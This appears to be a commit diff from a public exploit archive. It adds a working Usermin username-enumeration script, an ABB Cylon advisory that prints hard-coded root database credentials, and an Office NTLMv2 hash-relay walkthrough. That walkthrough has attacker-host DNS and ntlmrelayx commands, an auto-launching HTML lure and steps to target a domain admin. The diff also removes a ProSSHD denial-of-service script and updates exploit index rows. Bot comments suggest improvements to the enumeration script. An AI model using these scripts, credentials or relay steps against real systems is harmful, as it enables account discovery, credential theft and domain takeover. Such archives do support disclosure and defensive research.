# https://senscybersecurity.nl/cve-2024-44762-explained/
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Username Enumeration (Version 2.100)
# Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
# Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt
import requests
import json
import requests
import argparse
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")
args = parser.parse_args()
if len(sys.argv) != 5:
print("Please provide the -u for URL and -w for the wordlist containing the usernames")
print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt")
exit()
usernameFile = open(args.wordlist_users, 'r')
dataUsername = usernameFile.read()
usernameFileIntoList = dataUsername.split("\n")
usernameFile.close()
for i in usernameFileIntoList:
newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
if "Failed to change password: The current password is incorrect." in response.text:
print("Possible user found with username: " + i)
if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
print("Application is most likely not vulnerable and are therefore quitting.")
exit() # comment out line 33-35 if you would still like to try username enumeration.
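Review bot: The `#!/usr/bin/python3` line sits below the header comments, so it is not a shebang and the file will not pick the intended interpreter when executed directly; it belongs on line 1, above `# Exploit Title`. `if len(sys.argv) != 5` is a brittle substitute for argparse — the `--url=...` form or any extra flag fails it — and bare `exit()` depends on the `site` module; declaring both arguments with `required=True` and using `sys.exit(1)` removes both issues. `requests` is imported twice and `json` is never used. `dataUsername.split("\n")` leaves a trailing empty entry that is then sent as an empty username, and the comment `comment out line 33-35` refers to line numbers that no longer match the file; `with open(args.wordlist_users, encoding="utf-8") as f: usernameFileIntoList = f.read().splitlines()` also closes the file on every path.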


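--- a/exploits/php/webapps/52112.NA
+++ b/exploits/php/webapps/52112.NA
@@ -0,0 +1,82 @@
+ABB Cylon Aspect 3.07.01 (config.inc.php) Hard-coded Credentials in phpMyAdmin
+Vendor: ABB Ltd.
+Product web page: https://www.global.abb
+Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+Firmware: <=3.07.01
+Summary: ASPECT is an award-winning scalable building energy management
+and control solution designed to allow users seamless access to their
+building data through standard building protocols including smart devices.
+Desc: The ABB BMS/BAS controller is operating with default and hard-coded
+credentials contained in install package while exposed to the Internet.
+Tested on: GNU/Linux 3.15.10 (armv7l)
+GNU/Linux 3.10.0 (x86_64)
+GNU/Linux 2.6.32 (x86_64)
+Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+PHP/7.3.11
+PHP/5.6.30
+PHP/5.4.16
+PHP/4.4.8
+PHP/5.3.3
+AspectFT Automation Application Server
+lighttpd/1.4.32
+lighttpd/1.4.18
+Apache/2.2.15 (CentOS)
+OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+phpMyAdmin 2.11.9
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Reported by DIVD
+Advisory ID: ZSL-2024-5830
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5830.php
+CVE ID: CVE-2024-4007
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-4007
+21.04.2024
+--
+$ cat project
+P R O J E C T
+.|
+| |
+|'| ._____
+___ | | |. |' .---"|
+_ .-' '-. | | .--'| || | _| |
+.-'| _.| | || '-__ | | | || |
+|' | |. | || | | | | || |
+____| '-' ' "" '-' '-.' '` |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+$ cat max/var/www/html/phpMyAdmin/config.inc.php | grep control
+$cfg['Servers'][$i]['controluser'] = 'root';
+$cfg['Servers'][$i]['controlpass'] = 'F@c1liTy';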


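--- a/exploits/windows/remote/52110.txt
+++ b/exploits/windows/remote/52110.txt
@@ -1,68 +0,0 @@
-# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)
-# Google Dork: N/A
-# Date: 13 january 2024
-# Exploit Author: Fernando Mengali
-# Vendor Homepage: https://prosshd.com/
-# Software Link: N/A
-# Version: 1.2 20090726
-# Tested on: Windows XP
-# CVE: CVE-2024-0725
-$sis="$^O";
-if ($sis eq "windows"){
-$cmd="cls";
-} else {s
-$cmd="clear";
-}
-system("$cmd");
-intro();
-main();
-print "\t ==> Connecting to webserver... \n\n";
-sleep(1);
-my $i=0;
-print "\t ==> Exploiting... \n\n";
-my $payload = "\x41" x 500;
-$connection2 = Net::SSH2->new();
-$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";
-$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
-$scpget = $connection2->scp_get($payload);
-$connection2->disconnect();
-print "\t ==> Done! Exploited!";
-sub intro {
-print q {
-,--,
-_ ___/ /\|
-,;'( )__, ) ~
-// // '--;
-' \ | ^
-^ ^
-[+] ProSSHD 1.2 20090726 - Denial of Service (DoS)
-[*] Coded by Fernando Mengali
-[@] e-mail: fernando.mengalli@gmail.com
-}
-}
-sub main {
-our ($ip, $port, $username, $password) = @ARGV;
-unless (defined($ip) && defined($port)) {
-print "\n\tUsage: $0 <ip> <port> <username> <password> \n";
-exit(-1);
-}
-}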


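--- a/exploits/windows/remote/52113.NA
+++ b/exploits/windows/remote/52113.NA
@@ -0,0 +1,56 @@
+# Exploit Title: Microsoft Office NTLMv2 Disclosure Vulnerability
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.office.com/
+# Software Link: https://www.office.com/
+# Details: https://github.com/passtheticket/CVE-2024-38200
+# Version: Microsoft Office 2019 MSO Build 1808 (16.0.10411.20011), Microsoft 365 MSO (Version 2403 Build 16.0.17425.20176)
+# Tested against: Windows 11
+# CVE: CVE-2024-38200
+# Description
+MS Office URI schemes allow for fetching a document from remote source.
+MS URI scheme format is '< scheme-name >:< command-name >"|"< command-argument-descriptor > "|"< command-argument >' .
+Example: ms-word:ofe|u|http://hostname:port/leak.docx
+When the URI "ms-word:ofe|u|http://hostname:port/leak.docx" is invoked from a victim computer. This behaviour is abused to capture and relay NTLMv2 hash over SMB and HTTP. For detailed information about capturing a victim user's NTLMv2 hash over SMB, you can also visit https://www.privsec.nz/releases/ms-office-uri-handlers.
+# Proof Of Concept
+If we add a DNS A record and use this record within the Office URI, Windows will consider the hostname as part of the Intranet Zone. In this way, NTLMv2 authentication occurs automatically and a standard user can escalate privileges without needing a misconfigured GPO. Any domain user with standard privileges can add a non-existent DNS record so this attack works with default settings for a domain user.
+1. Add a DNS record to resolve hostname to attacker IP address which runs ntlmrelayx. It takes approximately 5 minutes for the created record to start resolving.
+$ python dnstool.py -u 'unsafe.local\testuser' -p 'pass' -r 'attackerhost' --action 'add' --data [attacker-host-IP] [DC-IP] --zone unsafe.local
+2. Fire up ntlmrelayx with following command
+$ python ntlmrelayx.py -t ldap://DC-IP-ADDRESS --escalate-user testuser --http-port 8080
+3. Serve following HTML file using Apache server. Replace hostname with added record (e.g. attackerhost).
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>Microsoft Office</title>
+</head>
+<body>
+<a id="link" href="ms-word:ofe|u|http://hostname:port/leak.docx"></a>
+<script>
+function navigateToLink() {
+var link = document.getElementById('link');
+if (link) {
+var url = link.getAttribute('href');
+window.location.href = url;
+}
+}
+window.onload = navigateToLink;
+</script>
+</body>
+</html>
+4. Send the URL of the above HTML file to a user with domain admin privileges. You should check whether the DNS record is resolved with the ping command before sending the URL. When the victim user navigates to the URL, clicking the 'Open' button is enough to capture the NTLMv2 hash. (no warning!)
+5. The captured NTLMv2 hash over HTTP is relayed to Domain Controller with ntlmrelayx. As a result, a standard user can obtain DCSync and Enterprise Admins permissions under the default configurations with just two clicks.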


@ -5480,6 +5480,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)",2021-08-04,"Adrián Díaz",webapps,java,,2021-08-04,2021-10-29,0,CVE-2020-9496,,,,,
32821,exploits/java/webapps/32821.html,"APC PowerChute Network Shutdown - HTTP Response Splitting / Cross-Site Scripting",2009-02-26,"Digital Security Research Group",webapps,java,,2009-02-26,2014-04-11,1,OSVDB-52503,,,,,https://www.securityfocus.com/bid/33924/info
40817,exploits/java/webapps/40817.txt,"AppFusions Doxygen for Atlassian Confluence 1.3.2 - Cross-Site Scripting",2016-11-22,"Julien Ahrens",webapps,java,,2016-11-22,2016-11-22,0,,,,,,
52118,exploits/java/webapps/52118.py,"AppSmith 1.47 - Remote Code Execution (RCE)",2025-04-03,"Nishanth Gaddam",webapps,java,,2025-04-03,2025-04-03,0,CVE-2024-55963,,,,,
50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",2021-10-05,"Mayank Deshmukh",webapps,java,,2021-10-05,2021-10-05,0,CVE-2021-26085,,,,,
40794,exploits/java/webapps/40794.txt,"Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal",2016-11-21,"Julien Ahrens",webapps,java,,2016-11-21,2016-11-21,0,,,,,,
42543,exploits/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,webapps,java,,2017-08-23,2017-08-23,0,CVE-2017-9640,,,,,
@ -10477,6 +10478,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19704,exploits/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 - PATH",1999-12-30,Loneguard,local,multiple,,1999-12-30,2012-07-09,1,CVE-2000-0009;OSVDB-1185,,,,,https://www.securityfocus.com/bid/907/info
35732,exploits/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,local,multiple,,2015-01-08,2015-01-08,0,OSVDB-116836,,,,,https://hatriot.github.io/blog/2015/01/06/ntpdc-exploit/
32501,exploits/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Vulnerabilities",2008-10-21,"Flavio D. Garcia",local,multiple,,2008-10-21,2019-03-28,1,,,,,,https://www.securityfocus.com/bid/31853/info
52116,exploits/multiple/local/52116.py,"ollama 0.6.4 - Server Side Request Forgery (SSRF)",2025-04-03,sud0,local,multiple,,2025-04-03,2025-04-03,0,,,,,,
19967,exploits/multiple/local/19967.txt,"Omnis Studio 2.4 - Weak Database Field Encryption",2000-05-25,Eric.Stevens,local,multiple,,2000-05-25,2012-07-20,1,CVE-2000-0449;OSVDB-11896,,,,,https://www.securityfocus.com/bid/1255/info
21856,exploits/multiple/local/21856.txt,"OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification",2002-09-25,"Mike Riley",local,multiple,,2002-09-25,2012-10-09,1,CVE-2002-1513;OSVDB-11089,,,,,https://www.securityfocus.com/bid/5790/info
10267,exploits/multiple/local/10267.txt,"Oracle - ctxsys.drvxtabc.create_tables",2009-12-01,"Andrea Purificato",local,multiple,,2009-11-30,,1,,,,,,
@ -11571,6 +11573,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19127,exploits/multiple/remote/19127.txt,"Verity Search97 2.1 - Security",1998-07-14,"Stefan Arentz",remote,multiple,,1998-07-14,2012-06-13,1,OSVDB-83170;OSVDB-83129,,,,,https://www.securityfocus.com/bid/162/info
22472,exploits/multiple/remote/22472.txt,"Vignette StoryServer 4.1 - Sensitive Stack Memory Information Disclosure",2003-04-07,@stake,remote,multiple,,2003-04-07,2012-11-04,1,CVE-2003-0400;OSVDB-4911,,,,,https://www.securityfocus.com/bid/7296/info
24983,exploits/multiple/remote/24983.txt,"Vilistextum 2.6.6 - HTML Attribute Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",remote,multiple,,2004-12-15,2013-04-30,1,CVE-2004-1299;OSVDB-12470,,,,,https://www.securityfocus.com/bid/11979/info
52111,exploits/multiple/remote/52111.py,"Vite 6.2.2 - Arbitrary File Read",2025-04-03,4m3rr0r,remote,multiple,,2025-04-03,2025-04-03,0,CVE-2025-30208,,,,,
44000,exploits/multiple/remote/44000.txt,"Vitek - Remote Command Execution / Information Disclosure (PoC)",2017-12-22,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/3220fa6a56c61cf53652e98356f94e0c6a833cd3/Vitek_RCE_and_information_disclosure.txt
44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/96892a5e7d513298b3181265055d437753dbaa55/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
15617,exploits/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,remote,multiple,,2010-11-30,2013-12-08,1,OSVDB-69586,,,http://www.exploit-db.com/screenshots/idlt16000/vmware-traversal.png,,
@ -11643,6 +11646,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44151,exploits/multiple/remote/44151.txt,"μTorrent (uTorrent) Classic/Web - JSON-RPC Remote Code Execution / Information Disclosure",2018-02-20,"Google Security Research",remote,multiple,,2018-02-20,2018-02-21,1,,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1524
34111,exploits/multiple/webapps/34111.txt,"(GREEZLE) Global Real Estate Agent Login - Multiple SQL Injections",2010-06-09,"L0rd CrusAd3r",webapps,multiple,,2010-06-09,2014-07-19,1,,,,,,https://www.securityfocus.com/bid/40676/info
33760,exploits/multiple/webapps/33760.txt,"(Multiple Products) - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,webapps,multiple,,2010-03-15,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38732/info
52115,exploits/multiple/webapps/52115.NA,"ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated)",2025-04-03,LiquidWorm,webapps,multiple,,2025-04-03,2025-04-03,0,CVE-na,,,,,
52107,exploits/multiple/webapps/52107.NA,"ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)",2025-04-02,LiquidWorm,webapps,multiple,,2025-04-02,2025-04-02,0,CVE-2024-6298,,,,,
43378,exploits/multiple/webapps/43378.py,"Ability Mail Server 3.3.2 - Cross-Site Scripting",2017-12-20,"Aloyce J. Makalanga",webapps,multiple,,2017-12-20,2017-12-20,0,CVE-2017-17752,,,,http://www.exploit-db.comams3.exe,
49298,exploits/multiple/webapps/49298.txt,"Academy-LMS 4.3 - Stored XSS",2020-12-21,"Vinicius Alves",webapps,multiple,,2020-12-21,2022-06-03,0,,,,,,
@ -12098,6 +12102,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",2021-10-19,"RedTeam Pentesting GmbH",webapps,multiple,,2021-10-19,2021-10-19,0,CVE-2021-42566;CVE-2021-42565,,,,,
48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"Cross-Site Scripting (XSS)",,,,
@ -12848,6 +12853,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,,2018-02-28,2018-02-28,1,CVE-2018-6193,,,,,
51509,exploits/perl/webapps/51509.py,"Thruk Monitoring Web Interface 3.06 - Path Traversal",2023-06-09,"Galoget Latorre",webapps,perl,,2023-06-09,2023-06-09,0,CVE-2023-34096,,,,,
44386,exploits/perl/webapps/44386.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal",2018-04-02,LiquidWorm,webapps,perl,,2018-04-02,2018-04-02,0,,,,,,
52114,exploits/perl/webapps/52114.py,"Webmin Usermin 2.100 - Username Enumeration",2025-04-03,Kjesper,webapps,perl,,2025-04-03,2025-04-03,0,CVE-2024-44762,,,,,
1651,exploits/php/dos/1651.php,"ADODB < 4.70 - 'tmssql.php' Denial of Service",2006-04-09,rgod,dos,php,,2006-04-08,2016-07-07,1,,,,,http://www.exploit-db.comadodb468.tgz,
30753,exploits/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - 'index.php' Denial of Service",2007-11-12,L4teral,dos,php,,2007-11-12,2014-01-06,1,CVE-2007-5984;OSVDB-45282,,,,,https://www.securityfocus.com/bid/26410/info
40996,exploits/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",dos,php,,2017-01-08,2017-01-09,0,,,,,,
@ -13414,6 +13420,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51058,exploits/php/webapps/51058.txt,"Abantecart v1.3.2 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-06-23,1,CVE-2022-26521,,,,,
27934,exploits/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - 'content.php' SQL Injection",2006-06-01,SpC-x,webapps,php,,2006-06-01,2013-08-29,1,CVE-2006-2853;OSVDB-26226,,,,,https://www.securityfocus.com/bid/18218/info
28944,exploits/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php,,2006-11-08,2013-10-14,1,,,,,,https://www.securityfocus.com/bid/20970/info
52112,exploits/php/webapps/52112.NA,"ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials",2025-04-03,LiquidWorm,webapps,php,,2025-04-03,2025-04-03,0,CVE-2024-4007,,,,,
52108,exploits/php/webapps/52108.NA,"ABB Cylon Aspect 3.08.01 - Arbitrary File Delete",2025-04-02,LiquidWorm,webapps,php,,2025-04-02,2025-04-02,0,CVE-2024-6209,,,,,
8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54287;CVE-2009-1550,,,,,
45836,exploits/php/webapps/45836.txt,"ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80,2018-11-13,2018-11-13,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comabc_v_0_6_4.zip,
@ -25393,7 +25400,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38039,exploits/php/webapps/38039.txt,"openSIS 5.1 - 'ajax.php' Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",webapps,php,,2012-11-20,2016-10-24,1,,,,,,https://www.securityfocus.com/bid/56598/info
50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory Traversal",2021-09-03,"Eric Salario",webapps,php,,2021-09-03,2021-10-22,0,CVE-2021-40651,,,,,
50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",2021-09-29,"Eric Salario",webapps,php,,2021-09-29,2021-09-29,0,,,,,,
52080,exploits/php/webapps/52080.txt,"openSIS 9.1 - SQLi (Authenticated)",2024-10-01,"Devrim Dıragumandan",webapps,php,,2024-10-01,2024-10-01,0,,,,,,
52080,exploits/php/webapps/52080.txt,"openSIS 9.1 - SQLi (Authenticated)",2024-10-01,"Devrim Dıragumandan",webapps,php,,2024-10-01,2025-04-03,0,CVE-2024-46626,,,,,
50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",2021-09-02,"Eric Salario",webapps,php,,2021-09-02,2021-09-03,0,,,,,,
50637,exploits/php/webapps/50637.txt,"openSIS Student Information System 8.0 - 'multiple' SQL Injection",2022-01-05,securityforeveryone.com,webapps,php,,2022-01-05,2022-01-05,0,,,,,,
15924,exploits/php/webapps/15924.txt,"openSite 0.2.2 Beta - Local File Inclusion",2011-01-07,n0n0x,webapps,php,,2011-01-07,2011-01-07,0,,,,,http://www.exploit-db.comopensite-v0.2.2-beta.zip,
@ -44302,6 +44309,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38968,exploits/windows/remote/38968.txt,"Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)",2015-12-14,"Google Security Research",remote,windows,,2015-12-14,2015-12-14,1,CVE-2015-6132;OSVDB-131342;MS15-132,,,,,https://code.google.com/p/google-security-research/issues/detail?id=556
28198,exploits/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,remote,windows,,2006-07-11,2013-09-10,1,CVE-2006-2389;OSVDB-27149,,,,,https://www.securityfocus.com/bid/18911/info
24526,exploits/windows/remote/24526.py,"Microsoft Office 2010 - Download Execute",2013-02-20,g11tch,remote,windows,,2013-02-20,2013-02-23,1,OSVDB-69085;CVE-2010-3333,,,http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-02-20-at-92423-am.png,,
52113,exploits/windows/remote/52113.NA,"Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure",2025-04-03,"Metin Yunus Kandemir",remote,windows,,2025-04-03,2025-04-03,0,CVE-2024-38200,,,,,
20122,exploits/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution (MS10-104) (Metasploit)",2012-07-31,Metasploit,remote,windows,8082,2012-07-31,2012-07-31,1,CVE-2010-3964;OSVDB-69817;MS10-104,"Metasploit Framework (MSF)",,,,http://www.zerodayinitiative.com/advisories/ZDI-10-287/
16537,exploits/windows/remote/16537.rb,"Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (MS09-043) (Metasploit)",2010-07-20,Metasploit,remote,windows,,2010-07-20,2016-10-27,1,CVE-2009-1136;OSVDB-55806;MS09-043,"Metasploit Framework (MSF)",,,,http://www.microsoft.com/technet/security/advisory/973472.mspx
9224,exploits/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Remote Overflow",2009-07-21,"Ahmed Obied",remote,windows,,2009-07-20,2017-11-22,1,,,,,,
@ -45070,7 +45078,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34943,exploits/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",remote,windows,,2010-11-01,2014-10-12,1,,,,,,https://www.securityfocus.com/bid/44569/info
36235,exploits/windows/remote/36235.txt,"PROMOTIC 8.1.3 - Multiple Vulnerabilities",2011-10-14,"Luigi Auriemma",remote,windows,,2011-10-14,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/50133/info
12495,exploits/windows/remote/12495.pl,"ProSSHD 1.2 - (Authenticated) Remote (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",remote,windows,,2010-05-02,,1,,,,,http://www.exploit-db.comsshdlabp.exe,
52110,exploits/windows/remote/52110.txt,"ProSSHD 1.2 - Denial of Service (DOS)",2025-04-02,"Fernando Mengali",remote,windows,,2025-04-02,2025-04-02,0,CVE-2024-0725,,,,,
11618,exploits/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Remote Buffer Overflow",2010-03-02,"S2 Crew",remote,windows,,2010-03-01,,1,,,,,http://www.exploit-db.comsshdlabp.exe,
16346,exploits/windows/remote/16346.rb,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,,2010-04-30,2016-10-27,1,CVE-2006-4948;OSVDB-29032,"Metasploit Framework (MSF)",,,http://www.exploit-db.comtftpdwin.exe,
3132,exploits/windows/remote/3132.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",remote,windows,69,2007-01-14,2016-10-27,1,OSVDB-29032;CVE-2006-4948,,,,http://www.exploit-db.comtftpdwin.exe,
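Review bot: The 52115 row in the `@ -11643,6 +11646,7 @@` hunk puts the literal token `CVE-na` in the codes column, while every other row on this page that has no identifier leaves that field empty (the 52116 and 52117 rows added elsewhere in this same change, for instance), so anything that parses the codes column as a list of CVE identifiers will pick up a bogus value. Assuming that row is the single addition the hunk header counts, the fix is to drop the placeholder and keep the field empty: `52115,exploits/multiple/webapps/52115.NA,"ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated)",2025-04-03,LiquidWorm,webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,`. The other new rows in this file section already follow the empty-field convention, so no further change is needed there.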
